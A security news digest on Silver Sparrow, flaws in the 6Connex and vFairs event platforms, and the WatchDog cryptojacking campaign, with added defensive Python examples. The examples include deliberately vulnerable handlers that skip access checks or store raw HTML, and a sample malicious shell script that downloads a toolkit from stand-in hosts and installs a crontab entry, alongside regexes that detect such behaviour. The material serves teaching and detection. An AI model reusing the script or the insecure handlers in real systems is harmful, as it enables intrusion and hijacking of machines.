At a glance.
- Silver Sparrow targets Macs.
- Vulnerabilities in virtual event platforms.
- WatchDog cryptomining operation stays under the radar.
Silver Sparrow targets Macs.
Researchers at Red Canary, with help from Malwarebytes and VMware Carbon Black, uncovered a malware downloader dubbed "Silver Sparrow" that's designed to run on Apple's new M1 chips. According to Malwarebytes, the malware has been detected on just under 40,000 Macs, although its purpose is unclear since it currently lacks a payload. The researchers also aren't sure how the malware is delivered. Red Canary's researchers say they "suspect that malicious search engine results direct victims to download the PKGs based on network connections from a victim’s browser shortly before download. In this case we can’t be certain because we don’t have the visibility to determine exactly what caused the download."
Red Canary concludes, "[T]he ultimate goal of this malware is a mystery. We have no way of knowing with certainty what payload would be distributed by the malware, if a payload has already been delivered and removed, or if the adversary has a future timeline for distribution.... Finally, the purpose of the Mach-O binary included inside the PKG files is also a mystery. Based on the data from script execution, the binary would only run if a victim intentionally sought it out and launched it. The messages we observed of 'Hello, World!' or 'You did it!' could indicate the threat is under development in a proof-of-concept stage or that the adversary just needed an application bundle to make the package look legitimate."
AppleInsider reports that Apple has revoked the developer certificates used by Silver Sparrow's author, which will prevent new infections.
Vulnerabilities in virtual event platforms.
Huntress has uncovered vulnerabilities in the virtual event platforms 6Connex and vFairs. The first flaw, which affected 6Connex, was a supply chain vulnerability through webcast.com. During 6Connex meetings, the platform would reach out to a webcast.com URL that contained a meeting ID. A user who visited this URL directly would see a JSON file containing every participant's country, state, IP address, first and last names, address, phone number, password, company, and email address. The researchers found that by changing the meeting ID in the URL, they could obtain the same information about the participants in any other 6Connex meeting. Huntress notified Webcast in October 2020, and the company fixed the flaw within a week.
The second set of flaws affected vFairs and allowed logged-in users to view other users' private information, including email addresses. Additionally, a user could update any other user's profile without permission, which could allow a user to launch a cross-site scripting attack against any chat room via users' profile descriptions. The researchers also found that users could exploit this flaw to upload a PHP file that would run on vFairs' servers. The researchers didn't go any further than this, since the severity of the vulnerability was already clear.
Huntress reported this flaw in September 2020. vFairs was slower to respond than 6Connex, but eventually acknowledged Huntress's notification. It's still not clear if the flaw has been patched, however.
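The three defects Huntress describes (a participant list keyed only by a guessable meeting ID, a profile update with no ownership check that becomes stored cross-site scripting, and an upload that accepts server-executable files) are all missing server-side checks. The following is an added illustration, not code from Huntress, 6Connex, vFairs or webcast.com: a minimal in-memory model in which each vulnerable handler sits beside the check that closes it. The meeting IDs, user names, e-mail addresses and the allowed-extension list are constructed for the example.

```python
"""Added example: broken access control, stored XSS and unsafe upload,
each paired with the server-side check that closes it (hypothetical code)."""
from html import escape
from pathlib import PurePosixPath
from urllib.parse import quote  # noqa: F401  (kept for readers extending the example)

# Constructed sample data; every name, ID and address here is hypothetical.
MEETINGS = {
    "m-100": ["alice", "bob"],
    "m-200": ["carol"],
}
PARTICIPANTS = {
    "alice": {"name": "Alice A.", "email": "alice@example.invalid", "phone": "555-0100"},
    "bob":   {"name": "Bob B.",   "email": "bob@example.invalid",   "phone": "555-0101"},
    "carol": {"name": "Carol C.", "email": "carol@example.invalid", "phone": "555-0102"},
}
PROFILES = {user: {"description": ""} for user in PARTICIPANTS}


class Forbidden(Exception):
    """Raised when the caller is not authorised for the requested object."""


# --- 1. Participant list keyed only by the meeting ID in the URL -------------
def participants_vulnerable(meeting_id):
    """Trusts the ID from the URL: any caller can enumerate any meeting,
    and every stored field (phone, e-mail, ...) is returned."""
    return [PARTICIPANTS[u] for u in MEETINGS[meeting_id]]


def participants_hardened(meeting_id, caller):
    """The caller must be a member of the meeting, and only the fields other
    participants actually need (here just the display name) are returned."""
    members = MEETINGS.get(meeting_id)
    if members is None or caller not in members:
        raise Forbidden(f"{caller} is not a participant of {meeting_id}")
    return [{"name": PARTICIPANTS[u]["name"]} for u in members]


# --- 2. Profile update with no ownership check (and stored XSS) ---------------
def update_profile_vulnerable(target, description):
    """Any logged-in user can overwrite anyone's profile, and the raw HTML is
    stored as-is, so it is later rendered into chat rooms unescaped."""
    PROFILES[target]["description"] = description
    return PROFILES[target]["description"]


def update_profile_hardened(target, caller, description):
    """Only the owner may edit a profile, and the text is HTML-escaped on
    the way in so markup in a description is rendered as inert text."""
    if target != caller:
        raise Forbidden(f"{caller} may not edit the profile of {target}")
    PROFILES[target]["description"] = escape(description, quote=True)
    return PROFILES[target]["description"]


# --- 3. Upload filter: allow-list the final extension, reject executables -----
ALLOWED_UPLOAD_EXT = {".png", ".jpg", ".jpeg", ".pdf"}          # constructed list
SERVER_EXECUTABLE_EXT = {".php", ".phtml", ".phar", ".jsp", ".cgi"}


def upload_allowed(filename):
    """Look only at the final path component (so 'x/../evil.php' is judged as
    'evil.php'), require an allow-listed last suffix, and additionally reject
    any server-executable suffix anywhere in a double extension."""
    name = PurePosixPath(filename).name
    suffixes = {s.lower() for s in PurePosixPath(name).suffixes}
    last = PurePosixPath(name).suffix.lower()
    if suffixes & SERVER_EXECUTABLE_EXT:
        return False
    return last in ALLOWED_UPLOAD_EXT
```

The pattern in all three hardened handlers is the same: the identifier in the request (meeting ID, target user, filename) is treated as untrusted input, and the server decides what the authenticated caller may see, change or store rather than the client.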
Huntress also took the opportunity to report a data breach that affected Axial, the largest M&A transaction platform for small- to medium-sized businesses. The breach, which hadn’t previously been disclosed or reported, exposed “250k+ confidential details on SMB mergers and acquisitions, financing, and more.” The data were briefly posted to Twitter before the social media platform deleted the posts and banned the user. The Twitter user who posted the data said Axial had “fully exposed their Jenkins server to the web, with no authentication and full access rights granted to anonymous users.”
For more, see the CyberWire's "Zero days in online meeting platforms."
WatchDog cryptomining operation stays under the radar.
Palo Alto Networks' Unit 42 outlines a major, long-running Monero cryptojacking campaign dubbed "WatchDog." The campaign has been active since at least January 2019, and the researchers "conservatively estimate that an average of 476 systems are actively involved within the WatchDog mining operation at any one time." The operation has generated at least 209 Monero coins, totaling approximately $32,000. The malware is distributed by scanning for and exploiting known vulnerabilities:
"The authors of the script tipped their hand to show how they set up and configure their mining infrastructure. Within every known operation, the initialization bash script is downloaded onto the compromised system and performs a series of functions. Several of the functions are common to a majority of cryptojacking operations, namely the removal of cloud security tools, the removal of previously installed and known malicious cryptomining software, and then the downloading and setup of the customized malicious cryptomining software. However, the WatchDog bash script miner also hardcodes a primary and secondary URL address that are used to download the WatchDog mining toolkit."
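The behaviours Unit 42 lists for the initialization script (kill off previously installed miners, fetch the toolkit from a hardcoded primary or secondary URL, then install it) are also what a defender can look for when triaging a shell script pulled off a compromised host. The following is an added example, not Unit 42's tooling or anything from the WatchDog campaign: a small pattern-based triage pass over a constructed, inert sample script whose hosts use the reserved `.invalid` domain. The rule names, regexes and the "two or more rules" threshold are assumptions for the illustration.

```python
"""Added example: static triage of a shell script for cryptojacking-style
behaviour (kill prior software, download from hardcoded URLs with a fallback,
install persistence). Hypothetical rules; not Unit 42's detection logic."""
import re
from urllib.parse import urlparse

# Constructed sample; the hosts are reserved names and the script is inert.
SAMPLE_INIT_SCRIPT = """\
#!/bin/bash
pkill -f oldminer
rm -rf /tmp/.oldminer
curl -fsSL http://primary.example.invalid/toolkit.tar.gz -o /tmp/t.tgz || wget -q http://secondary.example.invalid/toolkit.tar.gz -O /tmp/t.tgz
tar xzf /tmp/t.tgz -C /tmp && /tmp/toolkit/run.sh
(crontab -l; echo "* * * * * /tmp/toolkit/run.sh") | crontab -
"""

URL_RE = re.compile(r"https?://[^\s'\"|]+")

# Each rule is matched per line; the line numbers where it fires are reported.
RULES = {
    "kills_prior_software": re.compile(r"\b(pkill|killall|kill\s+-9)\b"),
    "downloads_payload":    re.compile(r"\b(curl|wget)\b[^|\n]*https?://"),
    "installs_persistence": re.compile(r"\bcrontab\b|/etc/cron"),
}

# A download command followed by '||' on the same line is the primary/secondary
# URL fallback pattern described above.
FALLBACK_RE = re.compile(r"\b(curl|wget)\b[^\n]*\|\|")


def analyze_script(text, min_rules=2):
    """Return which rules fired (with 1-based line numbers), the distinct
    download hosts, whether a fallback download is present, and a verdict."""
    lines = text.splitlines()
    hits = {
        name: [i + 1 for i, line in enumerate(lines) if rx.search(line)]
        for name, rx in RULES.items()
    }
    hosts = sorted({urlparse(u).hostname for u in URL_RE.findall(text)})
    fallback = bool(FALLBACK_RE.search(text))
    fired = sum(1 for v in hits.values() if v)
    return {
        "hits": hits,
        "download_hosts": hosts,
        "has_fallback_download": fallback,
        "suspicious": fired >= min_rules,
    }


if __name__ == "__main__":
    report = analyze_script(SAMPLE_INIT_SCRIPT)
    for rule, where in report["hits"].items():
        print(f"{rule:22s} lines {where}")
    print("download hosts:", report["download_hosts"])
    print("fallback download:", report["has_fallback_download"])
    print("suspicious:", report["suspicious"])
```

Signature rules like these are a triage aid rather than a verdict: a legitimate installer also downloads and schedules things, so the hosts and the combination of behaviours (old software removed, payload fetched with a fallback URL, persistence added in one script) are what should drive escalation.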